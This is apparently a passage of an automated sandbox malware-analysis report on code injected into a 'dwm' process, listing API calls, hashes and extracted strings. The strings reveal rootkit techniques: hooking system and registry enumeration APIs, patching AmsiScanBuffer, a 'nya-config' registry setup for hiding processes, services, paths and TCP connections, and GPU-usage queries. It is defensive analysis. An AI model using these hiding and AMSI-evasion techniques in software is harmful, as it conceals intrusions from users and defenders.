                                                          • Opcode Fuzzy Hash: 8659059d713f10fb2b36df29fda00c285aebd80b25688c8f1dc0718561e99dbb
                                                          • Instruction Fuzzy Hash: A7F03026218B44C0D670EB05E86574A77B0E3C8BD4F244111FACD07F69DF3AC980CB21

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000002BAAED91724: GetProcessHeap.KERNEL32 ref: 000002BAAED9172F
                                                            • Part of subcall function 000002BAAED91724: HeapAlloc.KERNEL32 ref: 000002BAAED9173E
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED917AE
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED917DB
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED917F5
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED91815
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.KERNELBASE ref: 000002BAAED91830
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED91850
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED9186B
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED9188B
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED918A6
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED918C6
                                                          • SleepEx.KERNELBASE ref: 000002BAAED91BDF
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED918E1
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED91901
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED9191C
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED9193C
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED91957
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED91977
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED91992
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.KERNELBASE ref: 000002BAAED9199C
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction ID: e9fd47210766d6569e59dd8c20d80ed9a0c09a2ff7de7f8689da7331f05a9ba0
                                                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction Fuzzy Hash: 8D312E6520065181FB54AB36DE49369B3B4AB44BC0F3654298E9D87B9AFF27CC50C236

                                                           Control-flow Graph: control_flow_graph 408 2baaed9f370-2baaed9f39f VirtualProtect
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: 25316a16912ca12bc714b53722a03786effec4f62070619cf2aaf5c36f98a599
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: BAD01225B31540C3F300DB11D8597957338F398701FD04009E98D92694DF7CC259CB61

                                                           Control-flow Graph: control_flow_graph 409 2baaee0f370-2baaee0f39f VirtualProtect
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: f7fd4c512c6ef310e7b18dd7c690a35b185d764d70a9a2e2a72a94665c0beb33
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: 44D01225731540D3F710DF51D849B957339F398701FD04009E98982A98CF7CC699CB61

                                                           Control-flow Graph: control_flow_graph 410 2baaee6f370-2baaee6f39f VirtualProtect
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406821651.000002BAAEE61000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE60000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406712710.000002BAAEE60000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406937121.000002BAAEE75000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2407031430.000002BAAEE80000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2407274554.000002BAAEE82000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2407383423.000002BAAEE89000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee60000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: f1b8af5bd91885cd0305abdc11aacc5b5dbe0f2f4fc016c1b1ab739c1f334080
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: D8D01225731580D3F310DB11D8497A57339F398701FE04005E98982A98CF7CC659CB61
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: bdca8bda7c5dfb7893c2609220d437f944bdb23d298c147b6434803ef09f334d
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 3BB1A07221069082EB699F65D9087AAB3B5F744F84F64501AEE8D53F94FF36CD40C362
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: 155aa4d9f456daa5ea3c7b8e8ead6d52db64bd2f92368d4ad293a470bb00e7c6
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 5431A176204B809AEB60DF60E8443EE7375F784748F54442ADB8E57B98EF78C658C721
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: 661ed4b192b4d2d055d4a3645d28c793987b4ae472b21c420f8d8299d9bf4ac3
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 5B416E36214F8086EB60DF25E84839E73B4F7887A4F600615EADD47B98EF78C655CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: 37c71513f5cf5599a1d775cccc2396235419aa10ddcf9e95c3dd03e7f94f023b
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: A8416D36214B8096EB60CF65E8443AE73B4F788764F600125EADD47F98DF38C599CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: 7a7c8da5176cc6c09b3aa039bc97ae577ecaa5b117708b78e80320ac1fa80808
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: 9DA1E32270468049FB209B75ED883AD7FB1E785B9CF244115DEDD2BE99EB3AC841C712
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: c1f12f0b514c343254ac31443cd378a1cf3a90a2b5d0826bba6c205aebb85a73
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: F8A116227447816AFBB0DB75E8883AD7BB1E781B94F244115DEC8A7F99DB38C481C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: bd11025053fb7aa7a53168d0ab28a33b478d506817012eb9481df5ff4a85e8ef
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 24713C26310B50A6EB70EF65E89869C33B5FB94B88F601115DD8D97F68DF38C584C361
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: cebaff3c61d899f97e1bf93c5b96be8170e2f5278e10bac2761a40080f80a2ee
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: D951C164140A0AB6EB69EFA8EC4E7D43371B758344FA4052394C952E76DF3C869AC373
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: 875b6c273a972ce80b51597fc12170985c1e8e6eea07ffb0aadac7a29460f4cc
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 1C516D72210B849AE724DF62E84836AB7B2F788F98F544524DE8E07B58EF3CC559C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: a067508f51625b2c2bae80ebe518ec66c5eea82c160fa1096d00fd055a8bd0a7
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 46515E32210B84AAE765DF62E44835A77B2F798FD8F544124DE8A07B68DF3CC089C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 68197df44c621a720fe3b4e437889c92559270bd35f1cdcc811d724bcb9c4742
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 9331CE22A00B40ABEB21DF52A80C759B3B0F788FD5F650525DE8D43B64EF38C966C361
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: 72117d965a548ff4cbc988bc592d1e70a197e30027a532bd1495d658dfa48cf0
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: 7131BF71610B419AEB50EF22A888759B3F1F788F94F644025DE8E83B64EF38C951C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: 26675a9d0e71cc55802d77e91e030b9b538f2f10633933ef70f19f644b80b483
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: D4D18D3360078086EB68DF65D4C93AD3BB0F755798F900116EF8997B9AEB36C181C792
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: 5fa69ced554f89c9fcf9ad212c28b6292f85bd46dc4a9c45599d002d759cce87
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
